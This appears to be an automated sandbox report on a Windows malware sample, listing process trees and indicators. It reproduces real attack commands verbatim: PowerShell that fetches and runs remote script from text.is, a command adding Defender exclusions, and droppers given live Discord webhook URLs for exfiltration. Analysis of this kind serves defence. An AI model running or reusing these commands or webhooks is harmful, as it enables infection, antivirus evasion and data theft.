6244	Malwarebytes.exe
6244	Malwarebytes.exe
6244	Malwarebytes.exe
6244	Malwarebytes.exe
6244	Malwarebytes.exe
6244	Malwarebytes.exe
6244	Malwarebytes.exe
6244	Malwarebytes.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe

Suspicious use of SetWindowsHookEx 57 IoCs

Processes:

mmc.exemmc.exemmc.exemmc.exeMEMZ (1).exewordpad.exemmc.exemmc.exeMEMZ (1).exeMEMZ (1).exeMEMZ (1).exeBonziBuddy432.exetv_enua.exeMSAGENT.EXEAgentSvr.exeBonziBDY_35.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]BonziBDY_35.EXEBonziBDY_4.EXEBonziBDY_4.EXEBonziBDY_4.EXE@[email protected]OpenWith.exemsedge.exeMEMZ.exe

pid	process
1336	mmc.exe
3332	mmc.exe
3332	mmc.exe
2852	mmc.exe
5192	mmc.exe
5192	mmc.exe
4168	MEMZ (1).exe
4168	MEMZ (1).exe
2284	wordpad.exe
2284	wordpad.exe
2284	wordpad.exe
2284	wordpad.exe
2284	wordpad.exe
4168	MEMZ (1).exe
7136	mmc.exe
5496	mmc.exe
5496	mmc.exe
3324	MEMZ (1).exe
2960	MEMZ (1).exe
5888	MEMZ (1).exe
5284	BonziBuddy432.exe
5552	tv_enua.exe
5912	MSAGENT.EXE
5260	AgentSvr.exe
6660	BonziBDY_35.EXE
6660	BonziBDY_35.EXE
1140	iexplore.exe
1140	iexplore.exe
4920	IEXPLORE.EXE
4920	IEXPLORE.EXE
1140	iexplore.exe
1140	iexplore.exe
6100	IEXPLORE.EXE
6100	IEXPLORE.EXE
1140	iexplore.exe
1140	iexplore.exe
5888	IEXPLORE.EXE
5888	IEXPLORE.EXE
7092	@[email protected]
7092	@[email protected]
1892	@[email protected]
1892	@[email protected]
2864	@[email protected]
2864	@[email protected]
916	@[email protected]
4184	@[email protected]
6012	@[email protected]
2924	BonziBDY_35.EXE
2444	BonziBDY_4.EXE
2444	BonziBDY_4.EXE
4796	BonziBDY_4.EXE
6052	BonziBDY_4.EXE
212	@[email protected]
4320	OpenWith.exe
2684	msedge.exe
2684	msedge.exe
2552	MEMZ.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

hentai_and_nudes.exehentai_and_nudes.exepowershell.exeWScript.exechrome.exe

description	pid	process	target process
PID 3864 wrote to memory of 4284	3864	hentai_and_nudes.exe	hentai_and_nudes.exe
PID 3864 wrote to memory of 4284	3864	hentai_and_nudes.exe	hentai_and_nudes.exe
PID 4284 wrote to memory of 1388	4284	hentai_and_nudes.exe	powershell.exe
PID 4284 wrote to memory of 1388	4284	hentai_and_nudes.exe	powershell.exe
PID 1388 wrote to memory of 6792	1388	powershell.exe	WScript.exe
PID 1388 wrote to memory of 6792	1388	powershell.exe	WScript.exe
PID 6792 wrote to memory of 6876	6792	WScript.exe	powershell.exe
PID 6792 wrote to memory of 6876	6792	WScript.exe	powershell.exe
PID 6868 wrote to memory of 6996	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 6996	6868	chrome.exe	chrome.exe
PID 6792 wrote to memory of 3488	6792	WScript.exe	powershell.exe
PID 6792 wrote to memory of 3488	6792	WScript.exe	powershell.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 3228	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1960	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1960	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe
PID 6868 wrote to memory of 1792	6868	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

2104 attrib.exe
5164 attrib.exe

pid	process
2104	attrib.exe
5164	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\hentai_and_nudes.exe
"C:\Users\Admin\AppData\Local\Temp\hentai_and_nudes.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3864

C:\Users\Admin\AppData\Local\Temp\hentai_and_nudes.exe
"C:\Users\Admin\AppData\Local\Temp\hentai_and_nudes.exe"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell11';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aaa.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:6792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess powershell.exe, cscript.exe, wscript.exe"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'https://text.is/somepowershell11/raw' -Method GET | Invoke-Expression"
6⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Users\Admin\AppData\Local\Updates.exe
"C:\Users\Admin\AppData\Local\Updates.exe"
7⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Users\Admin\AppData\Local\chromedrivers.exe
"C:\Users\Admin\AppData\Local\chromedrivers.exe"
8⤵
- Executes dropped EXE
PID:6364

C:\Users\Admin\AppData\Local\chromedrivers.exe
"C:\Users\Admin\AppData\Local\chromedrivers.exe"
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
10⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\sspcss.exe
C:\Users\Admin\AppData\Local\Temp\sspcss.exe "https://discord.com/api/webhooks/1237132709059366912/v5kpCK1ZaV2e9AHxh-hnSf_UbNyprQNGmlqqMcHPZTwwsci4wqtTIEYt1iFAByUkNxT6"
10⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 1948
11⤵
- Program crash
PID:864

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File %temp%\scrn.ps1
10⤵
PID:6928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\scrn.ps1
11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\raifee1d\raifee1d.cmdline"
12⤵
PID:6536

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EB3.tmp" "c:\Users\Admin\AppData\Local\Temp\raifee1d\CSC1AD1A99A3DB4453AA680E92439F63653.TMP"
13⤵
PID:4932

C:\Users\Admin\AppData\Local\Tempclipcoin.exe
C:\Users\Admin\AppData\Local\Tempclipcoin.exe
10⤵
- Executes dropped EXE
PID:6552

C:\Users\Admin\AppData\Local\Temp\tkdd.exe
C:\Users\Admin\AppData\Local\Temp\tkdd.exe "https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx"
10⤵
- Executes dropped EXE
PID:5660

C:\Users\Admin\AppData\Local\Temp\tkdd.exe
C:\Users\Admin\AppData\Local\Temp\tkdd.exe "https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx"
11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:6868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f38ab58,0x7ffb7f38ab68,0x7ffb7f38ab78
3⤵
PID:6996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:2
3⤵
PID:3228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:8
3⤵
PID:1960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:8
3⤵
PID:1792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:1
3⤵
PID:4920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:1
3⤵
PID:372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4388 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:1
3⤵
PID:3604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:8
3⤵
PID:2448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:8
3⤵
PID:2800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4852 --field-trial-handle=1972,i,3327397650295094077,9354018669743617482,131072 /prefetch:8
3⤵
PID:4256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
2⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
3⤵
PID:5336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
3⤵
PID:5540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2284 /prefetch:8
3⤵
PID:5632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
3⤵
PID:5800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
3⤵
PID:5812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
3⤵
PID:6148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
3⤵
PID:6156

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:8
3⤵
PID:6396

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
3⤵
PID:6516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
3⤵
PID:6628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
3⤵
PID:7076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
3⤵
PID:7036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5504 /prefetch:8
3⤵
PID:4172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5536 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
3⤵
PID:6016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
3⤵
PID:5800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
3⤵
PID:5848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
3⤵
PID:6324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2832 /prefetch:8
3⤵
PID:6716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
3⤵
PID:6724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 /prefetch:8
3⤵
PID:4936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
3⤵
PID:2892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
3⤵
PID:2144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
3⤵
PID:4468

